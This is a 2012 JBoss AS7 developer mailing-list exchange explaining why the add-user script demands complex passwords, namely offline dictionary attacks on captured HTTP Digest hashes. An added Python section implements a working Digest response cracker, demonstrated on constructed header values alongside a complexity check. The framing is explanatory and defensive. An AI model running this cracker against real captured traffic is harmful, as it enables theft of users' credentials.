[jboss-as7-dev] Relaxing password requirements for add-user script?

Darran Lofthouse darran.lofthouse at jboss.com
Wed Oct 10 05:50:33 EDT 2012


Would also add, for those working on this day to day, that there is nothing to
stop you backing up your properties files and just copying them back in
after a build - it is not really necessary to be running through the
add-user process.

Regards,
Darran Lofthouse.


On 10/10/2012 10:47 AM, Darran Lofthouse wrote:
> On 10/10/2012 08:23 AM, Jaikiran Pai wrote:
>> I never have
>> understood this specific requirement of passwords being forced to be of
>> certain type (many sites do it).
>
> The reason for the requirement is to reduce the effectiveness of
> dictionary based attacks by stopping the users from using commonly used
> words for their password.
>
> For Digest authentication which we are using by default the password is
> not transmitted in the clear - however a hash is transmitted and apart
> from the password used to generate the hash the rest of the information
> used to generate the hash is also visible.
>
> At this point, if you want to discover the user's password, you can try
> brute force regenerating the hashes by trying out one candidate password
> after another - passwords could be anything, so this is a big task;
> however, if most users are just going to pick a normal word or a name or
> something common like that, you have a much smaller sample to use to
> discover their password by trying each entry in the smaller sample.
>
> This brute force discovery of a password occurs offline and only
> requires the hashes from the captured packets, so we can't detect that it
> is happening; instead, a policy is in place to ensure more complex
> passwords are chosen - this way the brute force discovery has a much
> larger sample of passwords.
>
> Ideally SSL/TLS would still be enabled for these connections, which would
> prevent even the hashes being seen, but compared to BASIC authentication,
> where capturing one packet gets you the user's password, this is a step up
> as an intermediate step.
>
>> I'm not a security expert, but is this "your password has to have upper
>> case, lower case, digit, special char" requirement really worth it in a
>> real application?
>>
>>
>> [1]
>> https://issues.jboss.org/browse/AS7-2756?focusedCommentId=12653165&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-12653165
>>
>> -Jaikiran
>> _______________________________________________
>> jboss-as7-dev mailing list
>> jboss-as7-dev at lists.jboss.org
>> https://lists.jboss.org/mailman/listinfo/jboss-as7-dev
>>
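The offline attack Darran describes above, as an added example that is not part of the original thread or of the JBoss add-user tool: every input to an HTTP Digest response except the password (realm, nonce, cnonce, nc, qop, method, URI) is visible in the captured request, so an attacker regenerates candidate responses from a wordlist and compares them to the captured one. The Authorization header values and the wordlist are constructed for the demonstration, and the complexity check is an illustrative version of the "upper case, lower case, digit, special char" rule the thread debates, not the add-user tool's own implementation.

```python
"""Offline dictionary attack against a captured HTTP Digest exchange.

Added example, not code from JBoss AS7 or its add-user script.  It shows
why a weak password is recoverable from a single sniffed request: only the
password is secret; every other Digest input is on the wire.  The header
values and wordlist below are constructed for the demonstration.
"""
import hashlib
import re

# Constructed: parameters a sniffer would see in the client's request.
# Only the algorithm (RFC 2617 MD5, qop=auth) is real; names/values are made up.
CAPTURED_METHOD = "POST"
CAPTURED_PARAMS = {
    "username": "admin", "realm": "ManagementRealm",
    "nonce": "dcd98b7102dd2f0e8b11d0f600bfb0c093", "uri": "/management",
    "qop": "auth", "nc": "00000001", "cnonce": "0a4f113b",
}

# Constructed wordlist; a real attack uses millions of entries.
WORDLIST = ["letmein", "welcome", "admin", "password", "jboss", "summer2012"]


def md5_hex(s):
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 Digest response (MD5, qop=auth)."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")  # the only term holding the secret
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def parse_digest_header(header):
    """Split an 'Authorization: Digest ...' value into its key/value parameters."""
    if not header.startswith("Digest "):
        raise ValueError("not a Digest header")
    params = {}
    for m in re.finditer(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', header[len("Digest "):]):
        key, quoted, bare = m.groups()
        params[key] = quoted if quoted is not None else bare
    return params


def build_capture(password):
    """Render the header a client would send for the constructed exchange."""
    p = dict(CAPTURED_PARAMS)
    p["response"] = digest_response(p["username"], p["realm"], password, CAPTURED_METHOD,
                                    p["uri"], p["nonce"], p["nc"], p["cnonce"], p["qop"])
    return "Digest " + ", ".join(
        f"{k}={v}" if k in ("qop", "nc") else f'{k}="{v}"' for k, v in p.items())


def crack_digest(header, method, wordlist):
    """Offline attack: recompute the response for each candidate, compare to the capture.

    Returns the recovered password, or None if no candidate matched.
    """
    p = parse_digest_header(header)
    for candidate in wordlist:
        guess = digest_response(p["username"], p["realm"], candidate, method,
                                p["uri"], p["nonce"], p["nc"], p["cnonce"], p["qop"])
        if guess == p["response"]:
            return candidate
    return None


def meets_add_user_policy(password):
    """Illustrative complexity rule (upper, lower, digit, special, length >= 8).

    Assumption: this mirrors the rule discussed in the thread; it is not the
    add-user tool's actual check.
    """
    return (len(password) >= 8
            and any(c.isupper() for c in password)
            and any(c.islower() for c in password)
            and any(c.isdigit() for c in password)
            and any(not c.isalnum() for c in password))


if __name__ == "__main__":
    for pw in ("password", "xK9#pq2!Lm"):
        header = build_capture(pw)
        print(f"{pw!r}: passes policy={meets_add_user_policy(pw)}, "
              f"recovered offline={crack_digest(header, CAPTURED_METHOD, WORDLIST)!r}")
```

Run stand-alone, the dictionary word is recovered from the single captured header while the policy-compliant password is not found; the attacker never contacts the server, which is why the server side cannot rate-limit or log the attempt. TLS on the management interface removes the capture opportunity altogether, which is the mitigation the message prefers.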

